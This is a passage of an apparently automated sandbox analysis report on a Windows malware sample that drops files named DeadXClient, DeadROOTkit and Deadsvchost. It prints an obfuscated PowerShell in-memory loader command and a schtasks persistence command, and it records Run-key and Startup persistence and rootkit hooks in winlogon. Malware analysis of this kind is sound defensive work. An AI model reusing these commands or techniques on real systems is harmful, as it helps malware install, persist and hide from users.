Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)
                        Suspicious powershell command line found
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD8F787B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,5_2_00007FFD8F787B30
                        Source: select.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x9204
                        Source: md__mypyc.cp311-win_amd64.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1697d
                        Source: _bz2.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x13b27
                        Source: libffi-8.dll.2.drStatic PE information: real checksum: 0x0 should be: 0xa3cf
                        Source: 1.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x7db54
                        Source: aoKTzGQSRP.exeStatic PE information: real checksum: 0x9b3d14 should be: 0x9c5c96
                        Source: DeadXClient.exe.4.drStatic PE information: real checksum: 0x0 should be: 0xaf4a
                        Source: _ssl.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x11e83
                        Source: _socket.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1a742
                        Source: _queue.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xd492
                        Source: libssl-3.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x398cf
                        Source: _hashlib.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x170e7
                        Source: DeadCodeRootKit.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x3447e
                        Source: Deadsvchost.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xaf4a
                        Source: unicodedata.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x50b29
                        Source: _rust.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x20b882
                        Source: _ctypes.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x160fc
                        Source: md.cp311-win_amd64.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x3c4e
                        Source: DeadROOTkit.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x114e6
                        Source: _cffi_backend.cp311-win_amd64.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x15ec5
                        Source: libcrypto-3.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x192d2d
                        Source: python311.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x1a10e1
                        Source: _decimal.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x24c41
                        Source: _lzma.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x21bf5
                        Source: VCRUNTIME140.dll.2.drStatic PE information: section name: _RDATA
                        Source: libffi-8.dll.2.drStatic PE information: section name: UPX2
                        Source: _rust.pyd.2.drStatic PE information: section name: UPX2
                        Source: C:\Users\user\AppData\Local\Temp\1.exeCode function: 4_2_00007FFD344E00BD pushad ; iretd 4_2_00007FFD344E00C1
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485EAD push rsp; iretd 5_2_00007FFD93485EAE
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485EBC push rsi; ret 5_2_00007FFD93485EBD
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485FB9 push r10; ret 5_2_00007FFD93485FCC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93488DA5 push rsp; retf 5_2_00007FFD93488DA6
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD934882C4 push rdi; iretd 5_2_00007FFD934882C6
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93488077 push r12; iretd 5_2_00007FFD9348808B
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9348767B push r12; ret 5_2_00007FFD934876BF
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485F76 push r8; ret 5_2_00007FFD93485F83
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9348685F push rsi; ret 5_2_00007FFD93486896
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485C31 push r10; ret 5_2_00007FFD93485C33
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93487630 push rbp; retf 5_2_00007FFD93487649
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93488F28 push rsp; iretq 5_2_00007FFD93488F29
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93487F53 push rbp; iretq 5_2_00007FFD93487F54
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485E58 push rdi; iretd 5_2_00007FFD93485E5A
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485F56 push r12; ret 5_2_00007FFD93485F6E
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485EFA push r12; ret 5_2_00007FFD93485F07
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485DF7 push r10; retf 5_2_00007FFD93485DFA
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485CE0 push r10; retf 5_2_00007FFD93485CE2
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93487FEB push r12; ret 5_2_00007FFD93488036
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485CE5 push r8; ret 5_2_00007FFD93485CEB
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485E0F push rsp; ret 5_2_00007FFD93485E17
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9348930D push rsp; ret 5_2_00007FFD9348930E
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93488405 push r10; retf 5_2_00007FFD93488471
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485CFE push rdx; ret 5_2_00007FFD93485D01
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93485D06 push r12; ret 5_2_00007FFD93485D08
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935C4541 push rcx; ret 5_2_00007FFD935C4542
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3B437B push r8; ret 5_2_00007FFD9F3B4380
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3BD888 push rax; retn 8F7Eh5_2_00007FFD9F3BD889
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_00007FFD344F00BD pushad ; iretd 6_2_00007FFD344F00C1
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_00007FFD344F023D push ds; retf 6_2_00007FFD344F0272
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Found pyInstaller with non standard icon
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeFile created: C:\Users\user\AppData\Local\Temp\1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\libssl-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\python311.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadXClient.exeJump to dropped file
                        Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\Public\Deadsvchost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pydJump to dropped file
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeFile created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadROOTkit.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadCodeRootKit.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI48002\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadROOTkit.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadXClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadCodeRootKit.exeJump to dropped file
                        Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\Public\Deadsvchost.exeJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the user root directory
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadROOTkit.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadXClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadCodeRootKit.exeJump to dropped file
                        Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\Public\Deadsvchost.exeJump to dropped file
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                        Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnkJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnkJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadsvchostJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadsvchostJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hooks files or directories query functions (used to hide files and directories)
                        Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                        Hooks processes query functions (used to hide processes)
                        Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                        Hooks registry keys query functions (used to hide registry keys)
                        Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                        Modifies the prolog of user mode functions (user mode inline hooks)
                        Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE42E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00007FF6FABE42E0
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE DeadstagerJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
